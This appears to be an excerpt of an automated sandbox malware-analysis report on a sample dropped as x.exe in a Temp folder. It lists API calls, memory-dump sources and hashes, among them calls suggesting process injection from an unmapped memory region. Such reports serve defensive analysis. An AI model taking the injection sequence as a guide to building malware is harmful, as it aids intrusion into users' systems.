                                                                                                                                                      • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                                                                                                                      • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                                                                                                                    • String ID: X$pWH
                                                                                                                                                    • API String ID: 85490731-941433119
                                                                                                                                                    • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                                                                                                    • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                                                                                                                    • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                                                                                                    • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                                                                                                                    Strings
                                                                                                                                                    • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\x.exe, xrefs: 00410107
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _strcat
                                                                                                                                                    • String ID: >>>AUTOIT NO CMDEXECUTE<<<$C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                                    • API String ID: 1765576173-923358484
                                                                                                                                                    • Opcode ID: afbcd64a5de9b9cf0401a7756764eed502eca04e8b93ddfb1cf174919bef9872
                                                                                                                                                    • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                                                                                                                                    • Opcode Fuzzy Hash: afbcd64a5de9b9cf0401a7756764eed502eca04e8b93ddfb1cf174919bef9872
                                                                                                                                                    • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                                                                                                                                    APIs
                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 00431E34
                                                                                                                                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00431E4C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Temp$FileNamePath
                                                                                                                                                    • String ID: aut
                                                                                                                                                    • API String ID: 3285503233-3010740371
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Similarity
• API ID: __wcsicoll
• String ID:
• API String ID: 3832890014-0
APIs
Similarity
• API ID: __filbuf__getptd_noexit__read_memcpy_s
• String ID:
• API String ID: 1794320848-0
APIs
• _malloc.LIBCMT ref: 0043214B
  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
• _malloc.LIBCMT ref: 0043215D
• _malloc.LIBCMT ref: 0043216F
Similarity
• API ID: _malloc$AllocateHeap
• String ID:
• API String ID: 680241177-0
APIs
• CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000), ref: 00431DF5
• SetFileTime.KERNELBASE(00000000,?,00000000,?), ref: 00431E0D
• CloseHandle.KERNEL32(00000000), ref: 00431E14
Similarity
• API ID: File$CloseCreateHandleTime
• String ID:
• API String ID: 3397143404-0
APIs
• _free.LIBCMT ref: 0043210A
  • Part of subcall function 00413748: RtlFreeHeap.NTDLL(00000000,00000000,?,00417A5A,00000000), ref: 0041375E
  • Part of subcall function 00413748: GetLastError.KERNEL32(00000000,?,00417A5A,00000000), ref: 00413770
• _free.LIBCMT ref: 0043211D
• _free.LIBCMT ref: 00432130
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
APIs
Similarity
• API ID: _memmove
• String ID:
• API String ID: 4104443479-0
APIs
  • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
  • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
  • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
• _strcat.LIBCMT ref: 0040F786
  • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
  • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3199840319-0
                                                                                                                                                    • Opcode ID: bb46ec354e5f074944f6d6ffaaad758367fe0d935ff0e0da6eb4efd6d0eafcba
                                                                                                                                                    • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                                                                                                                                    • Opcode Fuzzy Hash: bb46ec354e5f074944f6d6ffaaad758367fe0d935ff0e0da6eb4efd6d0eafcba
                                                                                                                                                    • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                                                    • __lock_file.LIBCMT ref: 00414A8D
                                                                                                                                                      • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                                                                                                                    • __fclose_nolock.LIBCMT ref: 00414A98
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2800547568-0
                                                                                                                                                    • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                                                                                                    • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                                                                                                                                    • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                                                                                                    • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                                                                                                                                    APIs
                                                                                                                                                    • __lock_file.LIBCMT ref: 00415012
                                                                                                                                                    • __ftell_nolock.LIBCMT ref: 0041501F
                                                                                                                                                      • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2999321469-0
                                                                                                                                                    • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                                                                                                    • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                                                                                                                                    • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                                                                                                    • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                                                                                                                                    APIs
                                                                                                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 02F31ACD
                                                                                                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 02F31AF1
                                                                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02F31B13
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1726754865.0000000002F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_2f30000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2438371351-0
                                                                                                                                                    • Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                                                                                                    • Instruction ID: 5910c64c6e008dde56f68090f18e8b373bb62a706b1bb805c906c45547512ad4
                                                                                                                                                    • Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                                                                                                    • Instruction Fuzzy Hash: 2712CE24E18658C6EB24DF64D8507DEB232EF68340F1090E9D10DEB7A5E77A4E81CF5A
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4104443479-0
                                                                                                                                                    • Opcode ID: 7d4bf282be97faa598aef49f35025b485b6d7313d47a9894d7d30610d981dab9
                                                                                                                                                    • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                                                                                                                                    • Opcode Fuzzy Hash: 7d4bf282be97faa598aef49f35025b485b6d7313d47a9894d7d30610d981dab9
                                                                                                                                                    • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4104443479-0
                                                                                                                                                    • Opcode ID: 7bcbe236245efc3dcbe4508d56e566c7f81f194657cd8416221797d331caa60f
                                                                                                                                                    • Instruction ID: 412edbf2df7bf8c64f36b821a583ca4e96a0f18e0b9aed18a790d0e499aeb9a1
                                                                                                                                                    • Opcode Fuzzy Hash: 7bcbe236245efc3dcbe4508d56e566c7f81f194657cd8416221797d331caa60f
                                                                                                                                                    • Instruction Fuzzy Hash: 60319CB9600A21EFC714DF19C580A62F7E0FF08310B14C57ADA89CB795E774E892CB99
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4dcdcbe9ad79790a1096564f6089ef7e9ebf333e554a3dff892159d4d739e5a4
                                                                                                                                                    • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
• Opcode Fuzzy Hash: 4dcdcbe9ad79790a1096564f6089ef7e9ebf333e554a3dff892159d4d739e5a4
• Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
APIs
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: __lock_file
• String ID:
• API String ID: 3031932315-0
• Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
• Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
• Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
• Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
APIs
• __lock_file.LIBCMT ref: 004142F5
  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: __getptd_noexit__lock_file
• String ID:
• API String ID: 2597487223-0
• Opcode ID: 9ac44007e71a67e96c9bd323172c2fd33b2afcf641493e6b5ffc56499b4cea67
• Instruction ID: 8e443c470cd329b51aa0b2c66eafbe77d500ce91655981cf057e69b52ab9faa9
• Opcode Fuzzy Hash: 9ac44007e71a67e96c9bd323172c2fd33b2afcf641493e6b5ffc56499b4cea67
• Instruction Fuzzy Hash: 34F0C230A00219EBCF11BFB188024DF7B71EF44754F01845BF4205A151C73C8AD1EB99
APIs
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: __wfsopen
• String ID:
• API String ID: 197181222-0
• Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
• Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
• Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
• Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
APIs
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
• Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
• Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
• Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
APIs
• Sleep.KERNELBASE(000001F4), ref: 02F322B1
Memory Dump Source
• Source File: 00000005.00000002.1726754865.0000000002F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2f30000_x.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
• Instruction ID: 52cc68fbe5ac9360015c3e04a5e73a8b6a0ed9faf9713594077b872739be9be3
• Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
• Instruction Fuzzy Hash: 6DE0BF7494010EEFDB00EFA8D9496DE7BB4FF04711F1005A1FD05D7680DB309E548A62
APIs
• Sleep.KERNELBASE(000001F4), ref: 02F322B1
Memory Dump Source
• Source File: 00000005.00000002.1726754865.0000000002F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2f30000_x.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
• Instruction ID: 8afb7675e556e13baf09de65d3fe3b9bbf239873e52ac5280c48e838a7975eaa
• Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
• Instruction Fuzzy Hash: 2BE0E67494010EDFDB00EFB8D94969E7FB4FF04701F100161FD01D2280D6309D508A72
APIs
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
• DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
• GetKeyState.USER32(00000011), ref: 0047C92D
• GetKeyState.USER32(00000009), ref: 0047C936
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
• GetKeyState.USER32(00000010), ref: 0047C953
• GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
• SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
• SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
• _wcsncpy.LIBCMT ref: 0047CA29
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
• SendMessageW.USER32 ref: 0047CA7F
• InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
• SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
• ImageList_SetDragCursorImage.COMCTL32(00A142E0,00000000,00000000,00000000), ref: 0047CB9B
• ImageList_BeginDrag.COMCTL32(00A142E0,00000000,000000F8,000000F0), ref: 0047CBAC
• SetCapture.USER32(?), ref: 0047CBB6
• ClientToScreen.USER32(?,?), ref: 0047CC17
• ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
• ReleaseCapture.USER32 ref: 0047CC3A
• GetCursorPos.USER32(?), ref: 0047CC72
• ScreenToClient.USER32(?,?), ref: 0047CC80
